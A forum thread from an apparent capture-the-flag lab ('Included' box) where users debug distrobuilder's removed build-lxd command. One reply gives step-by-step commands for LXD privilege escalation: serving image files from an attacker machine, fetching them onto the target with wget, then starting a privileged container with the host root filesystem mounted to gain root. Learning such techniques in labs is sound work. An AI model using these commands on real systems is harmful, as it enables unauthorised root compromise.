I am currently doing the Included box. Everything is going well until the point that I try to build the lxd Alpine image.
If I try to build. WIth the command: sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
I get the following error:
Error: unknown command "build-lxd" for "distrobuilder"
Did you mean this?
build-lxc
Run 'distrobuilder --help' for usage.
Failed running distrobuilder: unknown command "build-lxd" for "distrobuilder"
Did you mean this?
build-lxc
So I tried to do it with build-lxc and it will build the image but the exploit doesnāt work that way it will also generate other files then the lxd.tar.xz rootfs.squashfs files that I should upload to the target machine.
Any idea what I am doing wrong or what I could do?
Literally having the same issue all day. I read in one other post that ālxdā is no longer supported or something, and when typing in ā./build-alpineā, i get āunsupported architecture: aarch64ā. So not sure if itās an issue because Iām on a Mac host, using Kali as VM?
Not having any success installing an older version of distrobuilder (2.1)
Tried 3.9 image, still nothing.
Still keeping my eyes open but this post is the only one so far that is running to the exact same issue (rather than similar issues in other parts of the box).
** Edit **
I did manage to install Distrobuilder 2.0, which does support build-lxd command. But when trying to proceed with the box, i still get errors. Not sure if itās some kind of compatibility error?
I donāt know what prompted you to be so nice to break down every step for meā¦ but using the pwnbox and the commands you provided for it worked AMAZINGLY.
I spent an ungodly amount of time trying to figure it out. I try not to skip it to mimic real world scenario where you canāt just give up on a task. But you also really helped me find out the easiest way to get previous versions of github repositories.
build-lxd is no longer supported in the 3.0 version of distrobuilder. Iāve tried cloning the repo and checking out the 2.1 tag instead, which does still have the command, but it fails to build succesfully when I run āmakeā in the directory. Also tried it with snapd but thatās running into a communications error.
Like user Singleday, I tried it with build-lxc instead, but this causes issues when running the lxc image import <files> --alias alpine command.
Just checkout to git checkout 5b05d03c354fe01bf25fe00674e530a30e5d8e13
before you execute the āmakeā command
then rename the resulting file after executing the ābuild-lxdā command mv incus.tar.xz lxd.tar.xz
then continue the walkthrough
Steps to get working LXC image from Canonical repo
# Get the images via wget
# -- NOTE: can do this on the target machine, or on attacker machine
# and then transfer it over via python3 http server.
# See below
wget https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/20241124_0023/lxd.tar.xz .
wget https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/20241124_0023/rootfs.squashfs .
# -- OPTIONAL: get these from attacker machine
# Serve the directory with Python3
python3 -m http.server 8080
# On target machine -- Get the files
wget ${attackerIp}/lxd.tar.xz
wget ${attackerIp}/rootfs.squashfs
# -- IMPORT LXC IMAGE
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
Exploitation:
# Add privleged mode
lxc init alpine privesc -c security.privileged=true
# Mount the root disk
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
# Run the container
lxc start privesc
lxc exec privesc /bin/sh
Thank you for this. It worked for me where other solution write ups did not. It is also simple and straight forward.
I did get a strange prompt when calling /bin/sh in which
^[[34;18R
was added after the # however it does not really stop one from getting the root flag.